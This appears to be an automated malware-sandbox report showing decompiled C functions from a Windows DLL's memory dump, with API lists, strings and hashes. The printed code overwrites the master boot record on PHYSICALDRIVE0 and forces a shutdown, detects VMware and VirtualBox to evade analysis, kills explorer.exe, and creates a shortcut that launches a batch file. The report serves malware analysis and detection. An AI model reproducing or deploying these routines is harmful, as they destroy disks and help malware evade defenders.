																__eflags =  *_t190 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008;
																 *(_t281 + 0x10c) = E1001087A(_t271,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
																 *(_t281 + 0x110) = _t271;
															}
															__eflags = _v5;
															if(_v5 != 0) {
																_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
																__eflags =  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008;
																 *(_t281 + 0x114) = E1001087A(_t270,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
																 *(_t281 + 0x118) = _t270;
															}
															goto L57;
														}
													}
													__eflags = _t276 - 7;
													if(_t276 == 7) {
														goto L36;
													}
													__eflags = _t276 - 0xb;
													if(_t276 == 0xb) {
														goto L36;
													}
													__eflags = _t276 - 0xe;
													if(_t276 != 0xe) {
														goto L37;
													}
													goto L36;
												}
												goto L31;
											}
											goto L26;
										}
									}
									_push(_v12);
									L10015800();
									goto L19;
								}
								return 0x700;
							}
							E100100E2(_t133);
							L11:
							goto L12;
						}
						E100100A1(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t273 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}

0x100109fe
0x10010a0a
0x10010a0d
0x10010a10
0x10010a14
0x10010a17
0x10010e28
0x00000000
0x10010e28
0x10010a1d
0x10010a22
0x00000000
0x00000000
0x10010a2b
0x10010a2e
0x10010a33
0x10010a33
0x10010a3a
0x10010a3d
0x10010a5c
0x10010a5e
0x10010aaa
0x10010aac
0x10010aaf
0x10010ab8
0x10010ab8
0x10010aba
0x10010abd
0x10010adf
0x10010af2
0x10010afa
0x10010afc
0x10010b10
0x10010b18
0x10010b1a
0x10010b47
0x00000000
0x10010b47
0x10010b1c
0x10010b1f
0x10010b26
0x10010b31
0x10010b39
0x10010b3c
0x10010b53
0x10010b59
0x10010b69
0x10010b6f
0x10010b76
0x10010b76
0x10010b78
0x10010b7a
0x00000000
0x00000000
0x10010b7c
0x10010b7c
0x10010b80
0x00000000
0x00000000
0x10010b83
0x10010b76
0x10010b76
0x10010b78
0x10010b7a
0x00000000
0x00000000
0x00000000
0x10010b7a
0x10010b86
0x10010b86
0x10010b88
0x10010b8e
0x10010b8e
0x10010b76
0x10010b76
0x10010b78
0x10010b7a
0x00000000
0x00000000
0x00000000
0x10010b7a
0x00000000
0x10010b76
0x10010b8a
0x10010b8c
0x10010b97
0x10010b9d
0x10010ba0
0x10010bd5
0x10010bd5
0x10010bd5
0x00000000
0x10010bd5
0x10010ba8
0x10010bae
0x10010bb1
0x00000000
0x00000000
0x10010bb9
0x10010bbf
0x10010bc2
0x00000000
0x00000000
0x10010bca
0x10010bd0
0x10010bd3
0x10010bdf
0x10010be4
0x10010bec
0x10010bf0
0x10010c00
0x10010c02
0x10010c05
0x10010c05
0x10010c08
0x10010c0a
0x10010c1b
0x10010c25
0x10010c2f
0x10010c31
0x10010c3c
0x10010c3e
0x10010c3e
0x10010c40
0x10010c42
0x10010c42
0x10010c44
0x10010c46
0x10010c4c
0x10010c4e
0x10010c4e
0x10010c58
0x10010c5a
0x10010c5c
0x10010c5c
0x10010c5c
0x10010c5c
0x10010c63
0x10010c67
0x10010c69
0x10010c69
0x10010c69
0x10010c69
0x10010c70
0x10010c72
0x10010c74
0x10010c74
0x10010c74
0x10010c74
0x10010c7b
0x10010c7f
0x10010c81
0x10010c81
0x10010c81
0x10010c81
0x10010c8e
0x10010c97
0x10010caa
0x10010cb6
0x10010cb9
0x10010cbf
0x10010cc2
0x10010cc5
0x10010cc9
0x10010ccc
0x10010cd2
0x10010cd8
0x10010cde
0x10010ce4
0x10010cea
0x10010cf0
0x10010dfb
0x10010dfb
0x10010dfd
0x10010dff
0x10010e00
0x10010e05
0x10010e0f
0x10010e13
0x10010e1e
0x00000000
0x10010cf6
0x10010cf6
0x10010cfe
0x10010d05
0x10010d09
0x10010d11
0x10010d18
0x10010d1e
0x10010d21
0x00000000
0x00000000
0x10010d26
0x10010d2d
0x10010d30
0x00000000
0x00000000
0x00000000
0x10010d32
0x10010d37
0x10010d45
0x10010d4a
0x10010d4d
0x10010d50
0x10010d53
0x10010d56
0x10010d58
0x10010d5d
0x10010d62
0x10010d76
0x10010d7e
0x10010d84
0x10010d88
0x10010d88
0x10010d8e
0x10010d90
0x10010d92
0x10010d97
0x10010d9c
0x10010db0
0x10010db8
0x10010dbf
0x10010dbf
0x10010dc5
0x10010dc9
0x10010dcb
0x10010de6
0x10010dee
0x10010df5
0x10010df5
0x00000000
0x10010dc9
0x10010cf0
0x10010c0c
0x10010c0f
0x00000000
0x00000000
0x10010c11
0x10010c14
0x00000000
0x00000000
0x10010c16
0x10010c19
0x00000000
0x00000000
0x00000000
0x10010c19
0x00000000
0x10010bd3
0x00000000
0x10010b8c
0x10010b76
0x10010b3e
0x10010b41
0x00000000
0x10010b46
0x00000000
0x10010afe
0x10010ac0
0x10010ab7
0x00000000
0x10010ab7
0x10010ab2
0x00000000
0x10010ab2
0x00000000
0x10010a3f
0x10010a41
0x10010a60
0x10010a65
0x10010a68
0x10010a6c
0x10010a6f
0x10010a75
0x10010a7b
0x10010a81
0x10010a87
0x10010a8d
0x10010a93
0x10010a99
0x10010a9f
0x10010e24
0x00000000
0x10010e24
0x10010a4f
0x00000000
0x10010a54

APIs

memcpy.MSVCRT ref: 10010A4F

Strings

/..\, xrefs: 10010BC4
\../, xrefs: 10010BA2
/../, xrefs: 10010BB3
\..\, xrefs: 10010B91

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID: /../$/..\$\../$\..\
API String ID: 3510742995-3885502717
Opcode ID: 3039705c4519d1d703964ce123479a360607b55d7c1953682d4434384779a83a
Instruction ID: 8d3f2db18a67360871e0b6af25c609fddc271c1877a52b9b58d4dfc7b884ce23
Opcode Fuzzy Hash: 3039705c4519d1d703964ce123479a360607b55d7c1953682d4434384779a83a
Instruction Fuzzy Hash: DED1F272A082449FDB19CF64C481AEABBF4EF09304F15856EF4D99F242D7B1E985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100077D3, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 90
filesleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E100077D3(long _a4) {
				long _v8;
				char _v9;
				char _v10;
				void _v519;
				void _v520;
				signed int _t16;
				int _t17;
				signed int _t29;
				void* _t35;

				_t29 = 0x7f;
				_v520 = 0;
				memset( &_v519, 0, _t29 << 2);
				asm("stosw");
				asm("stosb");
				if(_a4 == 0) {
					_push(1);
				} else {
					_push(0x18);
				}
				memcpy( &_v520, 0x100239f0, ??);
				_v10 = 0x55;
				_v9 = 0xaa;
				_t16 = CreateFileA("\\\\.\\PHYSICALDRIVE0", 0xc0000000, 3, 0, 3, 0, 0);
				_t35 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t35 != _t17) {
					DeviceIoControl(_t35, 0x90018, 0, 0, 0, 0,  &_a4, 0);
					WriteFile(_t35,  &_v520, 0x200,  &_v8, 0);
					DeviceIoControl(_t35, 0x9001c, 0, 0, 0, 0,  &_a4, 0);
					CloseHandle(_t35);
					Sleep(0x7d0);
					if(GetVersion() < 0x80000000) {
						E10007762("SeShutdownPrivilege", 1);
					}
					_t17 = ExitWindowsEx(6, 0);
					ExitProcess(0xffffffff);
				}
				return _t17;
			}

0x100077e2
0x100077eb
0x100077f1
0x100077f6
0x100077f8
0x100077f9
0x100077ff
0x100077fb
0x100077fb
0x100077fb
0x1000780d
0x10007816
0x1000781a
0x1000782f
0x10007835
0x10007837
0x1000783c
0x10007858
0x1000786c
0x10007881
0x10007884
0x1000788f
0x100078a1
0x100078aa
0x100078b0
0x100078b4
0x100078bc
0x100078bc
0x100078c5

APIs

memcpy.MSVCRT ref: 1000780D
CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000782F
DeviceIoControl.KERNEL32 ref: 10007858
WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 1000786C
DeviceIoControl.KERNEL32 ref: 10007881
CloseHandle.KERNEL32(00000000), ref: 10007884
Sleep.KERNEL32(000007D0), ref: 1000788F
GetVersion.KERNEL32 ref: 10007895
ExitWindowsEx.USER32(00000006,00000000), ref: 100078B4
ExitProcess.KERNEL32 ref: 100078BC

Strings

\\.\PHYSICALDRIVE0, xrefs: 1000782A
U, xrefs: 10007816
SeShutdownPrivilege, xrefs: 100078A5

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ControlDeviceExitFile$CloseCreateHandleProcessSleepVersionWindowsWritememcpy
String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
API String ID: 1150823962-3993181469
Opcode ID: 99240307ac86ba37cc82b3d28aca9dc021bbf5209e2cc21f0db876652c1df678
Instruction ID: a3b8063a731da6299bebc4da4111cb134729d75f9fd08a0c7ccc2cdd2a4a5a06
Opcode Fuzzy Hash: 99240307ac86ba37cc82b3d28aca9dc021bbf5209e2cc21f0db876652c1df678
Instruction Fuzzy Hash: 6421B0B294421CBEFB1197648CCEFBB3B6CFB447A8F104165F618A50D1DB705E458A72

Uniqueness

Uniqueness Score: -1.00%

Function 100021BC, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 87
stringservicememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100021BC() {
				char* _v8;
				int _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _t17;
				void* _t26;
				struct _ENUM_SERVICE_STATUS* _t31;
				char** _t43;

				_t17 = OpenSCManagerA(0, 0, 4);
				_v16 = _t17;
				if(_t17 == 0) {
					L2:
					return _t17 | 0xffffffff;
				}
				_v24 = 0;
				_v12 = 0;
				_v20 = 0;
				_t31 = LocalAlloc(0x40, 0x10000);
				_t17 = EnumServicesStatusA(_v16, 0x30, 3, _t31, 0x10000,  &_v24,  &_v12,  &_v20);
				if(_t17 != 0) {
					_v8 = 0;
					if(_v12 <= 0) {
						L10:
						CloseServiceHandle(_v16);
						return 0;
					}
					_t11 = _t31 + 4; // 0x4
					_t43 = _t11;
					while(strstr( *_t43, "VMware Tools") == 0 && strstr( *_t43, 0x100231fc) == 0 && strstr( *_t43, "Virtual Machine") == 0 && strstr( *_t43, "VirtualBox Guest") == 0) {
						_v8 = _v8 + 1;
						_t43 =  &(_t43[9]);
						if(_v8 < _v12) {
							continue;
						}
						goto L10;
					}
					_t26 = 1;
					return _t26;
				}
				goto L2;
			}

0x100021cb
0x100021d3
0x100021d6
0x10002210
0x00000000
0x10002210
0x100021dd
0x100021e3
0x100021e6
0x100021ef
0x10002206
0x1000220e
0x10002218
0x1000221b
0x10002274
0x10002277
0x00000000
0x1000227d
0x10002223
0x10002223
0x10002226
0x10002266
0x10002269
0x10002272
0x00000000
0x00000000
0x00000000
0x10002272
0x10002286
0x00000000
0x10002286
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,?,?,?,?,10002A61), ref: 100021CB
LocalAlloc.KERNEL32(00000040,00010000,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,?,?,?,?,10002A61), ref: 100021E9
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00010000,?,?,?), ref: 10002206
strstr.MSVCRT ref: 1000222D
strstr.MSVCRT ref: 10002240
strstr.MSVCRT ref: 1000224F
strstr.MSVCRT ref: 1000225E
CloseServiceHandle.ADVAPI32(?,?,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,?,?,?,?,10002A61), ref: 10002277

Strings

VMware Tools, xrefs: 10002226
Virtual Machine, xrefs: 10002248
VirtualBox Guest, xrefs: 10002257
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 100021C2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strstr$AllocCloseEnumHandleLocalManagerOpenServiceServicesStatus
String ID: VMware Tools$Virtual Machine$VirtualBox Guest$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 2978233460-3426673259
Opcode ID: 548794dcd8a1d6589063015ccb663ae3da15804756d18d7aa4a8688ca4e52a36
Instruction ID: e6e684e5123be7b86e011c1230bbd2354b42087f37a40df437b8f509aeea05ce
Opcode Fuzzy Hash: 548794dcd8a1d6589063015ccb663ae3da15804756d18d7aa4a8688ca4e52a36
Instruction Fuzzy Hash: 04216076A0411AFBFB11EBD5DC44A9FBBB8EF443A5F214166F600E20A4DB718A00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 100022CE, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E100022CE() {
				CHAR* _t18;
				void* _t24;
				void* _t25;
				void* _t34;
				CHAR* _t35;
				void* _t37;
				void* _t39;
				void* _t42;

				E100158AC(E1001A11F, _t42);
				_t25 = 0;
				_t35 = malloc(0x104);
				GetEnvironmentVariableA("TEMP", _t35, 0x104);
				_t18 = _t42 - 0xd;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t35, _t18, _t34, _t37, _t24);
				 *(_t42 - 4) =  *(_t42 - 4) & 0;
				__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z("\\*");
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 = FindFirstFileA(_t18, _t42 - 0x160);
				if(_t39 != 0xffffffff) {
					do {
						_t25 = _t25 + 1;
					} while (FindNextFileA(_t39, _t42 - 0x160) != 0);
					FindClose(_t39);
				}
				if(_t25 <  *((intOrPtr*)(_t42 + 8))) {
					_push(1);
					_pop(0);
				}
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return 0;
			}

0x100022d3
0x100022e7
0x100022f0
0x100022f9
0x100022ff
0x10002307
0x1000230d
0x10002318
0x10002321
0x10002335
0x1000233a
0x1000233c
0x10002342
0x1000234b
0x10002350
0x10002350
0x10002359
0x1000235b
0x1000235d
0x1000235d
0x10002362
0x10002369
0x10002377
0x1000237f

APIs

__EH_prolog.LIBCMT ref: 100022D3
malloc.MSVCRT ref: 100022E9
GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 100022F9
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 10002307
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(10023240), ref: 10002318
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10002321
FindFirstFileA.KERNEL32(00000000,?), ref: 1000232F
FindNextFileA.KERNEL32(00000000,?), ref: 10002345
FindClose.KERNEL32(00000000), ref: 10002350
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10002369

Strings

TEMP, xrefs: 100022F4
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 100022DE

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Find$File$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@EnvironmentFirstH_prologNextV01@VariableY?$basic_string@malloc
String ID: TEMP$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 2338000368-1629165310
Opcode ID: a811269f440756b94841e8285a931abdc1a8e9be06f335fe733c69f4bdc69c48
Instruction ID: 9402f1ec9b28321b8813a49e4dbbb14a6245533764ac116db51c397dee05fe21
Opcode Fuzzy Hash: a811269f440756b94841e8285a931abdc1a8e9be06f335fe733c69f4bdc69c48
Instruction Fuzzy Hash: 9E11B231900428FBEB00DB64CCD8DEEB738FF09365F418169F912A20A0DB349E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100059ED, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 59
processCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100059ED() {
				char _v264;
				long _v292;
				void _v296;
				void* _v300;
				void* _t9;
				int _t14;
				void* _t20;
				void* _t22;
				signed int _t25;

				E1000D096("SeDebugPrivilege", 1);
				_t9 = CreateToolhelp32Snapshot(2, 0);
				_t22 = _t9;
				_t25 = 0x49;
				_v300 = 0x128;
				memset( &_v296, 0, _t25 << 2);
				Process32First(_t22,  &_v300);
				do {
					_t14 =  &_v264;
					__imp___strcmpi(_t14, "explorer.exe");
					if(_t14 == 0) {
						_t20 = OpenProcess(1, _t14, _v292);
						if(_t20 != 0) {
							TerminateProcess(_t20, 0);
						}
					}
				} while (Process32Next(_t22,  &_v300) != 0);
				CloseHandle(_t22);
				E1000D096("SeDebugPrivilege", 0);
				return 0;
			}

0x100059ff
0x10005a0a
0x10005a11
0x10005a13
0x10005a1c
0x10005a26
0x10005a30
0x10005a35
0x10005a35
0x10005a41
0x10005a4b
0x10005a56
0x10005a5e
0x10005a63
0x10005a63
0x10005a5e
0x10005a76
0x10005a7b
0x10005a88
0x10005a94

APIs

Part of subcall function 1000D096: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D0AE
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000D0BE
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000D0C9
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000D0D4
Part of subcall function 1000D096: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000D0DE
Part of subcall function 1000D096: GetCurrentProcess.KERNEL32(00000028,?), ref: 1000D0E9
Part of subcall function 1000D096: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000D12D
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000D135
Part of subcall function 1000D096: CloseHandle.KERNEL32(?), ref: 1000D144
Part of subcall function 1000D096: FreeLibrary.KERNEL32(00000000), ref: 1000D155
Part of subcall function 1000D096: FreeLibrary.KERNEL32(00000000), ref: 1000D160

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10005A0A
Process32First.KERNEL32(00000000,00000128), ref: 10005A30
_strcmpi.MSVCRT ref: 10005A41
OpenProcess.KERNEL32(00000001,00000000,?), ref: 10005A56
TerminateProcess.KERNEL32(00000000,00000000), ref: 10005A63
Process32Next.KERNEL32 ref: 10005A71
CloseHandle.KERNEL32(00000000,00000000,00000128), ref: 10005A7B

Strings

explorer.exe, xrefs: 10005A3B
SeDebugPrivilege, xrefs: 100059FA
SeDebugPrivilege, xrefs: 10005A83

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Library$AddressProc$LoadProcess$CloseFreeHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32_strcmpi
String ID: SeDebugPrivilege$SeDebugPrivilege$explorer.exe
API String ID: 3663464529-1519388501
Opcode ID: d0909bb23802dfdf85be4873e45a41c38b2222dba324119788a5284a6548d75b
Instruction ID: 872cfe72f560736d1874a280b4171aa42e415a8e6ae7da087c4bc6921cde4563
Opcode Fuzzy Hash: d0909bb23802dfdf85be4873e45a41c38b2222dba324119788a5284a6548d75b
Instruction Fuzzy Hash: 7701C076604305AEF720D6B0AC86FDA73ACEB08751F100456F605E90C1EEB2E9944A20

Uniqueness

Uniqueness Score: -1.00%

Function 100065AB, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 84
comstringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E100065AB() {
				void* _v8;
				void* _v12;
				char _v272;
				char _v532;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t38;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t58;
				void* _t61;

				GetCurrentDirectoryA(0x104,  &_v272);
				GetCurrentDirectoryA(0x104,  &_v532);
				strcat( &_v272, "\\PerProtect.exe");
				__imp__CoInitializeEx(0, 0, _t58, _t61);
				_t29 =  &_v8;
				__imp__CoCreateInstance(0x1001d258, 0, 1, 0x1001d248, _t29);
				if(_t29 == 0) {
					_t30 = _v8;
					 *((intOrPtr*)( *_t30 + 0x50))(_t30,  &_v272);
					_t32 = _v8;
					 *((intOrPtr*)( *_t32 + 0x2c))(_t32, "/c Perprotect.bat");
					_t34 = _v8;
					 *((intOrPtr*)( *_t34 + 0x24))(_t34,  &_v532);
					_t36 = _v8;
					 *((intOrPtr*)( *_t36 + 0x3c))(_t36, 7);
					_t38 = _v8;
					_push( &_v12);
					_push(0x1001d268);
					_push(_t38);
					if( *((intOrPtr*)( *_t38))() == 0) {
						_t41 = _v12;
						 *((intOrPtr*)( *_t41 + 0x18))(_t41, L"123.lnk", 1);
						_t43 = _v12;
						 *((intOrPtr*)( *_t43 + 8))(_t43);
					}
					_t40 = _v8;
					_t29 =  *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				__imp__CoUninitialize();
				return _t29;
			}

0x100065c9
0x100065d3
0x100065e1
0x100065ec
0x100065f2
0x10006603
0x1000660d
0x1000660f
0x1000661c
0x1000661f
0x1000662a
0x1000662d
0x1000663a
0x1000663d
0x10006645
0x10006648
0x1000664e
0x1000664f
0x10006656
0x1000665b
0x1000665d
0x1000666a
0x1000666d
0x10006673
0x10006673
0x10006676
0x1000667c
0x1000667c
0x1000667f
0x10006686

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 100065C9
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 100065D3
strcat.MSVCRT(?,\PerProtect.exe), ref: 100065E1
CoInitializeEx.OLE32(00000000,00000000), ref: 100065EC
CoCreateInstance.OLE32(1001D258,00000000,00000001,1001D248,?), ref: 10006603
CoUninitialize.OLE32 ref: 1000667F

Strings

/c Perprotect.bat, xrefs: 10006622
\PerProtect.exe, xrefs: 100065DB
123.lnk, xrefs: 10006662

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CurrentDirectory$CreateInitializeInstanceUninitializestrcat
String ID: /c Perprotect.bat$123.lnk$\PerProtect.exe
API String ID: 1251381691-3798372231
Opcode ID: a223aa3a7b0a1dbc12778afc3c90237646486a811ea15214fb8bbd054d1127fa
Instruction ID: 02b120871d2084316e6007c4682b869be34303e761c0ad08b6b1348abedcef98
Opcode Fuzzy Hash: a223aa3a7b0a1dbc12778afc3c90237646486a811ea15214fb8bbd054d1127fa
Instruction Fuzzy Hash: 2121D975600119AFDB00EBA4CC88EEA77B9EF89705F104199F509EB250DB71AE86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10002706, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002706(void* __eax) {
				signed char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void* _v24;
				_Unknown_base(*)()* _v28;
				char _v288;
				signed int _v316;
				void* _v324;
				struct HINSTANCE__* _t30;
				void* _t46;
				void* _t48;
				void* _t52;
				signed int _t58;
				signed int _t59;

				_t48 = _t46 - 1 + 1;
				_t59 = _t58 | 0xffffffff;
				_t30 = LoadLibraryA("Kernel32.dll");
				if(_t30 == 0) {
					L8:
					return _t59;
				}
				_v28 = GetProcAddress(_t30, "CreateToolhelp32Snapshot");
				_t52 = _t48 - 1 + 1;
				if(_v28 != 0) {
					_v24 = _v28(2, 0);
					_t48 = _t52 - 1 + 1;
					_v324 = 0x128;
					_t30 = Process32First(_v24,  &_v324);
					while(_t30 != 0) {
						_t48 = _t48 - 1 + 1;
						_v8 = _v8 & 0x00000000;
						_t10 =  &_v20; // 0x65
						_t30 =  &_v288;
						_v20 = 0x65;
						_v19 = 0x78;
						_v18 = 0x70;
						_v17 = 0x6c;
						_v16 = 0x6f;
						_v15 = 0x72;
						_v14 = 0x65;
						_v13 = 0x72;
						_v12 = 0x2e;
						_v11 = 0x65;
						_v10 = 0x78;
						_v9 = 0x65;
						__imp___stricmp(_t30, _t10);
						if(_t30 == 0) {
							_t59 = _v316;
							goto L8;
						}
						_t30 = Process32Next(_v24,  &_v324);
					}
					goto L8;
				}
				return _t59;
			}

0x10002714
0x1000271a
0x1000271d
0x10002725
0x100027dc
0x00000000
0x100027e2
0x10002737
0x1000273d
0x10002742
0x10002752
0x10002758
0x1000275f
0x1000276d
0x10002772
0x10002779
0x1000277a
0x1000277e
0x10002782
0x10002789
0x1000278d
0x10002791
0x10002795
0x10002799
0x1000279d
0x100027a1
0x100027a5
0x100027a9
0x100027ad
0x100027b1
0x100027b5
0x100027b9
0x100027c3
0x100027d6
0x00000000
0x100027d6
0x100027cf
0x100027cf
0x00000000
0x10002772
0x00000000

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 1000271D
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10002731
Process32First.KERNEL32(?,?), ref: 1000276D
_strcmpi.MSVCRT ref: 100027B9
Process32Next.KERNEL32 ref: 100027CF

Strings

explorer.exe, xrefs: 1000277E, 10002781
Kernel32.dll, xrefs: 10002715
CreateToolhelp32Snapshot, xrefs: 1000272B
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000270F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32$AddressFirstLibraryLoadNextProc_strcmpi
String ID: CreateToolhelp32Snapshot$Kernel32.dll$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$explorer.exe
API String ID: 2556968899-1981059685
Opcode ID: b1673fbb2d815c626c4453e8f25a7e9d03dd8dcdcd2d16a7b569b3dfecfcb9f3
Instruction ID: 963aa8f8cfacab4304f9ed04c5520e0151ededc5ca78cc8dae41b9a60a285b78
Opcode Fuzzy Hash: b1673fbb2d815c626c4453e8f25a7e9d03dd8dcdcd2d16a7b569b3dfecfcb9f3
